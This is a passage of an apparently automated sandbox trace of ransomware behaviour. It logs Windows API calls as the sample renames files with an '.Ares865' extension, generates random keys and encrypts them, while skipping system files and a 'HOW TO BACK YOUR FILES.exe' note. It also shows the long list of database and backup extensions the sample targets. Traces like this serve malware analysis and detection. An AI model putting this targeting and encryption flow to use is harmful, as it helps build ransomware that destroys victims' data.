[0059.488] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0059.488] lstrlenW (lpString="wrk") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0059.488] lstrlenW (lpString="xdb") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0059.488] lstrlenW (lpString="xld") returned 3 [0059.488] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0059.488] lstrlenW (lpString="xmlff") returned 5 [0059.488] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0059.488] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Searches\\desktop.ini.Ares865") returned 50 [0059.488] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Searches\\desktop.ini" (normalized: "c:\\users\\default user\\searches\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Searches\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\searches\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0059.495] CreateFileW (lpFileName="C:\\Users\\Default User\\Searches\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\searches\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0059.496] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=524) returned 1 [0059.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0059.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0059.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0738 [0059.496] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f07c0) returned 1 [0059.497] CryptGenRandom (in: hProv=0x2f07c0, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0059.497] CryptReleaseContext (hProv=0x2f07c0, dwFlags=0x0) returned 1 [0059.497] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x510, lpName=0x0) returned 0x15c [0059.504] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x510) returned 0x190000 [0059.506] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f06b0) returned 1 [0059.506] CryptGenRandom (in: hProv=0x2f06b0, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0059.506] CryptReleaseContext (hProv=0x2f06b0, dwFlags=0x0) returned 1 [0059.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0059.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0059.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.507] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.507] CloseHandle (hObject=0x15c) returned 1 [0059.507] CloseHandle (hObject=0x118) returned 1 [0059.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0059.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0738 | out: hHeap=0x2b0000) returned 1 [0059.509] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0059.509] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="aoldtz.exe") returned 1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".") returned 1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="..") returned 1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="windows") returned -1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="bootmgr") returned 1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="temp") returned -1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="pagefile.sys") returned -1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="boot") returned 1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ids.txt") returned -1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="ntuser.dat") returned -1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="perflogs") returned -1 [0059.509] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="MSBuild") returned -1 [0059.509] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0059.509] lstrlenW (lpString="C:\\Users\\Default User\\Searches\\desktop.ini") returned 42 [0059.509] lstrcpyW (in: lpString1=0x2cce43e, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0059.510] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0059.510] lstrlenW (lpString="Ares865") returned 7 [0059.510] lstrcmpiW (lpString1="arch-ms", lpString2="Ares865") returned -1 [0059.510] lstrlenW (lpString=".dll") returned 4 [0059.510] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".dll") returned 1 [0059.510] lstrlenW (lpString=".lnk") returned 4 [0059.510] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".lnk") returned 1 [0059.510] lstrlenW (lpString=".ini") returned 4 [0059.510] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".ini") returned 1 [0059.510] lstrlenW (lpString=".sys") returned 4 [0059.510] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2=".sys") returned 1 [0059.510] lstrlenW (lpString="Everywhere.search-ms") returned 20 [0059.510] lstrlenW (lpString="bak") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0059.510] lstrlenW (lpString="ba_") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0059.510] lstrlenW (lpString="dbb") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0059.510] lstrlenW (lpString="vmdk") returned 4 [0059.510] lstrcmpiW (lpString1="h-ms", lpString2="vmdk") returned -1 [0059.510] lstrlenW (lpString="rar") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0059.510] lstrlenW (lpString="zip") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0059.510] lstrlenW (lpString="tgz") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0059.510] lstrlenW (lpString="vbox") returned 4 [0059.510] lstrcmpiW (lpString1="h-ms", lpString2="vbox") returned -1 [0059.510] lstrlenW (lpString="vdi") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0059.510] lstrlenW (lpString="vhd") returned 3 [0059.510] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0059.510] lstrlenW (lpString="vhdx") returned 4 [0059.510] lstrcmpiW (lpString1="h-ms", lpString2="vhdx") returned -1 [0059.510] lstrlenW (lpString="avhd") returned 4 [0059.510] lstrcmpiW (lpString1="h-ms", lpString2="avhd") returned 1 [0059.510] lstrlenW (lpString="db") returned 2 [0059.511] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0059.511] lstrlenW (lpString="db2") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0059.511] lstrlenW (lpString="db3") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0059.511] lstrlenW (lpString="dbf") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0059.511] lstrlenW (lpString="mdf") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0059.511] lstrlenW (lpString="mdb") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0059.511] lstrlenW (lpString="sql") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0059.511] lstrlenW (lpString="sqlite") returned 6 [0059.511] lstrcmpiW (lpString1="rch-ms", lpString2="sqlite") returned -1 [0059.511] lstrlenW (lpString="sqlite3") returned 7 [0059.511] lstrcmpiW (lpString1="arch-ms", lpString2="sqlite3") returned -1 [0059.511] lstrlenW (lpString="sqlitedb") returned 8 [0059.511] lstrcmpiW (lpString1="earch-ms", lpString2="sqlitedb") returned -1 [0059.511] lstrlenW (lpString="xml") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0059.511] lstrlenW (lpString="$er") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0059.511] lstrlenW (lpString="4dd") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0059.511] lstrlenW (lpString="4dl") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0059.511] lstrlenW (lpString="^^^") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0059.511] lstrlenW (lpString="abs") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0059.511] lstrlenW (lpString="abx") returned 3 [0059.511] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0059.511] lstrlenW (lpString="accdb") returned 5 [0059.511] lstrcmpiW (lpString1="ch-ms", lpString2="accdb") returned 1 [0059.511] lstrlenW (lpString="accdc") returned 5 [0059.511] lstrcmpiW (lpString1="ch-ms", lpString2="accdc") returned 1 [0059.512] lstrlenW (lpString="accde") returned 5 [0059.512] lstrcmpiW (lpString1="ch-ms", lpString2="accde") returned 1 [0059.512] lstrlenW (lpString="accdr") returned 5 [0059.512] lstrcmpiW (lpString1="ch-ms", lpString2="accdr") returned 1 [0059.512] lstrlenW (lpString="accdt") returned 5 [0059.512] lstrcmpiW (lpString1="ch-ms", lpString2="accdt") returned 1 [0059.512] lstrlenW (lpString="accdw") returned 5 [0059.512] lstrcmpiW (lpString1="ch-ms", lpString2="accdw") returned 1 [0059.512] lstrlenW (lpString="accft") returned 5 [0059.512] lstrcmpiW (lpString1="ch-ms", lpString2="accft") returned 1 [0059.512] lstrlenW (lpString="adb") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.512] lstrlenW (lpString="adb") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0059.512] lstrlenW (lpString="ade") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0059.512] lstrlenW (lpString="adf") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0059.512] lstrlenW (lpString="adn") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0059.512] lstrlenW (lpString="adp") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0059.512] lstrlenW (lpString="alf") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0059.512] lstrlenW (lpString="ask") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0059.512] lstrlenW (lpString="btr") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0059.512] lstrlenW (lpString="cat") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0059.512] lstrlenW (lpString="cdb") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="cdb") returned 1 [0059.512] lstrlenW (lpString="ckp") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="ckp") returned 1 [0059.512] lstrlenW (lpString="cma") returned 3 [0059.512] lstrcmpiW (lpString1="-ms", lpString2="cma") returned 1 [0059.512] lstrlenW (lpString="cpd") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="cpd") returned 1 [0059.513] lstrlenW (lpString="dacpac") returned 6 [0059.513] lstrcmpiW (lpString1="rch-ms", lpString2="dacpac") returned 1 [0059.513] lstrlenW (lpString="dad") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dad") returned 1 [0059.513] lstrlenW (lpString="dadiagrams") returned 10 [0059.513] lstrcmpiW (lpString1=".search-ms", lpString2="dadiagrams") returned -1 [0059.513] lstrlenW (lpString="daschema") returned 8 [0059.513] lstrcmpiW (lpString1="earch-ms", lpString2="daschema") returned 1 [0059.513] lstrlenW (lpString="db-journal") returned 10 [0059.513] lstrcmpiW (lpString1=".search-ms", lpString2="db-journal") returned -1 [0059.513] lstrlenW (lpString="db-shm") returned 6 [0059.513] lstrcmpiW (lpString1="rch-ms", lpString2="db-shm") returned 1 [0059.513] lstrlenW (lpString="db-wal") returned 6 [0059.513] lstrcmpiW (lpString1="rch-ms", lpString2="db-wal") returned 1 [0059.513] lstrlenW (lpString="dbc") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dbc") returned 1 [0059.513] lstrlenW (lpString="dbs") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dbs") returned 1 [0059.513] lstrlenW (lpString="dbt") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dbt") returned 1 [0059.513] lstrlenW (lpString="dbv") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dbv") returned 1 [0059.513] lstrlenW (lpString="dbx") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dbx") returned 1 [0059.513] lstrlenW (lpString="dcb") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dcb") returned 1 [0059.513] lstrlenW (lpString="dct") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dct") returned 1 [0059.513] lstrlenW (lpString="dcx") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dcx") returned 1 [0059.513] lstrlenW (lpString="ddl") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="ddl") returned 1 [0059.513] lstrlenW (lpString="dlis") returned 4 [0059.513] lstrcmpiW (lpString1="h-ms", lpString2="dlis") returned 1 [0059.513] lstrlenW (lpString="dp1") returned 3 [0059.513] lstrcmpiW (lpString1="-ms", lpString2="dp1") returned 1 [0059.513] lstrlenW (lpString="dqy") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="dqy") returned 1 [0059.514] lstrlenW (lpString="dsk") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="dsk") returned 1 [0059.514] lstrlenW (lpString="dsn") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="dsn") returned 1 [0059.514] lstrlenW (lpString="dtsx") returned 4 [0059.514] lstrcmpiW (lpString1="h-ms", lpString2="dtsx") returned 1 [0059.514] lstrlenW (lpString="dxl") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="dxl") returned 1 [0059.514] lstrlenW (lpString="eco") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="eco") returned 1 [0059.514] lstrlenW (lpString="ecx") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="ecx") returned 1 [0059.514] lstrlenW (lpString="edb") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="edb") returned 1 [0059.514] lstrlenW (lpString="epim") returned 4 [0059.514] lstrcmpiW (lpString1="h-ms", lpString2="epim") returned 1 [0059.514] lstrlenW (lpString="fcd") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="fcd") returned 1 [0059.514] lstrlenW (lpString="fdb") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="fdb") returned 1 [0059.514] lstrlenW (lpString="fic") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="fic") returned 1 [0059.514] lstrlenW (lpString="flexolibrary") returned 12 [0059.514] lstrcmpiW (lpString1="re.search-ms", lpString2="flexolibrary") returned 1 [0059.514] lstrlenW (lpString="fm5") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="fm5") returned 1 [0059.514] lstrlenW (lpString="fmp") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="fmp") returned 1 [0059.514] lstrlenW (lpString="fmp12") returned 5 [0059.514] lstrcmpiW (lpString1="ch-ms", lpString2="fmp12") returned -1 [0059.514] lstrlenW (lpString="fmpsl") returned 5 [0059.514] lstrcmpiW (lpString1="ch-ms", lpString2="fmpsl") returned -1 [0059.514] lstrlenW (lpString="fol") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="fol") returned 1 [0059.514] lstrlenW (lpString="fp3") returned 3 [0059.514] lstrcmpiW (lpString1="-ms", lpString2="fp3") returned 1 [0059.515] lstrlenW (lpString="fp4") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0059.515] lstrlenW (lpString="fp5") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0059.515] lstrlenW (lpString="fp7") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0059.515] lstrlenW (lpString="fpt") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0059.515] lstrlenW (lpString="frm") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0059.515] lstrlenW (lpString="gdb") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.515] lstrlenW (lpString="gdb") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0059.515] lstrlenW (lpString="grdb") returned 4 [0059.515] lstrcmpiW (lpString1="h-ms", lpString2="grdb") returned 1 [0059.515] lstrlenW (lpString="gwi") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0059.515] lstrlenW (lpString="hdb") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0059.515] lstrlenW (lpString="his") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0059.515] lstrlenW (lpString="ib") returned 2 [0059.515] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0059.515] lstrlenW (lpString="idb") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0059.515] lstrlenW (lpString="ihx") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0059.515] lstrlenW (lpString="itdb") returned 4 [0059.515] lstrcmpiW (lpString1="h-ms", lpString2="itdb") returned -1 [0059.515] lstrlenW (lpString="itw") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0059.515] lstrlenW (lpString="jet") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0059.515] lstrlenW (lpString="jtx") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0059.515] lstrlenW (lpString="kdb") returned 3 [0059.515] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0059.516] lstrlenW (lpString="kexi") returned 4 [0059.516] lstrcmpiW (lpString1="h-ms", lpString2="kexi") returned -1 [0059.516] lstrlenW (lpString="kexic") returned 5 [0059.516] lstrcmpiW (lpString1="ch-ms", lpString2="kexic") returned -1 [0059.516] lstrlenW (lpString="kexis") returned 5 [0059.516] lstrcmpiW (lpString1="ch-ms", lpString2="kexis") returned -1 [0059.516] lstrlenW (lpString="lgc") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0059.516] lstrlenW (lpString="lwx") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0059.516] lstrlenW (lpString="maf") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0059.516] lstrlenW (lpString="maq") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0059.516] lstrlenW (lpString="mar") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0059.516] lstrlenW (lpString="marshal") returned 7 [0059.516] lstrcmpiW (lpString1="arch-ms", lpString2="marshal") returned -1 [0059.516] lstrlenW (lpString="mas") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0059.516] lstrlenW (lpString="mav") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0059.516] lstrlenW (lpString="maw") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0059.516] lstrlenW (lpString="mdbhtml") returned 7 [0059.516] lstrcmpiW (lpString1="arch-ms", lpString2="mdbhtml") returned -1 [0059.516] lstrlenW (lpString="mdn") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0059.516] lstrlenW (lpString="mdt") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0059.516] lstrlenW (lpString="mfd") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0059.516] lstrlenW (lpString="mpd") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0059.516] lstrlenW (lpString="mrg") returned 3 [0059.516] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0059.516] lstrlenW (lpString="mud") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0059.517] lstrlenW (lpString="mwb") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0059.517] lstrlenW (lpString="myd") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0059.517] lstrlenW (lpString="ndf") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0059.517] lstrlenW (lpString="nnt") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0059.517] lstrlenW (lpString="nrmlib") returned 6 [0059.517] lstrcmpiW (lpString1="rch-ms", lpString2="nrmlib") returned 1 [0059.517] lstrlenW (lpString="ns2") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0059.517] lstrlenW (lpString="ns3") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0059.517] lstrlenW (lpString="ns4") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0059.517] lstrlenW (lpString="nsf") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0059.517] lstrlenW (lpString="nv") returned 2 [0059.517] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0059.517] lstrlenW (lpString="nv2") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0059.517] lstrlenW (lpString="nwdb") returned 4 [0059.517] lstrcmpiW (lpString1="h-ms", lpString2="nwdb") returned -1 [0059.517] lstrlenW (lpString="nyf") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0059.517] lstrlenW (lpString="odb") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.517] lstrlenW (lpString="odb") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0059.517] lstrlenW (lpString="oqy") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0059.517] lstrlenW (lpString="ora") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0059.517] lstrlenW (lpString="orx") returned 3 [0059.517] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0059.517] lstrlenW (lpString="owc") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0059.518] lstrlenW (lpString="p96") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0059.518] lstrlenW (lpString="p97") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0059.518] lstrlenW (lpString="pan") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0059.518] lstrlenW (lpString="pdb") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0059.518] lstrlenW (lpString="pdm") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0059.518] lstrlenW (lpString="pnz") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0059.518] lstrlenW (lpString="qry") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0059.518] lstrlenW (lpString="qvd") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0059.518] lstrlenW (lpString="rbf") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0059.518] lstrlenW (lpString="rctd") returned 4 [0059.518] lstrcmpiW (lpString1="h-ms", lpString2="rctd") returned -1 [0059.518] lstrlenW (lpString="rod") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0059.518] lstrlenW (lpString="rodx") returned 4 [0059.518] lstrcmpiW (lpString1="h-ms", lpString2="rodx") returned -1 [0059.518] lstrlenW (lpString="rpd") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0059.518] lstrlenW (lpString="rsd") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0059.518] lstrlenW (lpString="sas7bdat") returned 8 [0059.518] lstrcmpiW (lpString1="earch-ms", lpString2="sas7bdat") returned -1 [0059.518] lstrlenW (lpString="sbf") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0059.518] lstrlenW (lpString="scx") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0059.518] lstrlenW (lpString="sdb") returned 3 [0059.518] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0059.519] lstrlenW (lpString="sdc") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0059.519] lstrlenW (lpString="sdf") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0059.519] lstrlenW (lpString="sis") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0059.519] lstrlenW (lpString="spq") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0059.519] lstrlenW (lpString="te") returned 2 [0059.519] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0059.519] lstrlenW (lpString="teacher") returned 7 [0059.519] lstrcmpiW (lpString1="arch-ms", lpString2="teacher") returned -1 [0059.519] lstrlenW (lpString="tmd") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0059.519] lstrlenW (lpString="tps") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0059.519] lstrlenW (lpString="trc") returned 3 [0059.519] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0059.519] lstrlenW (lpString="trc") returned 3 [0059.519] 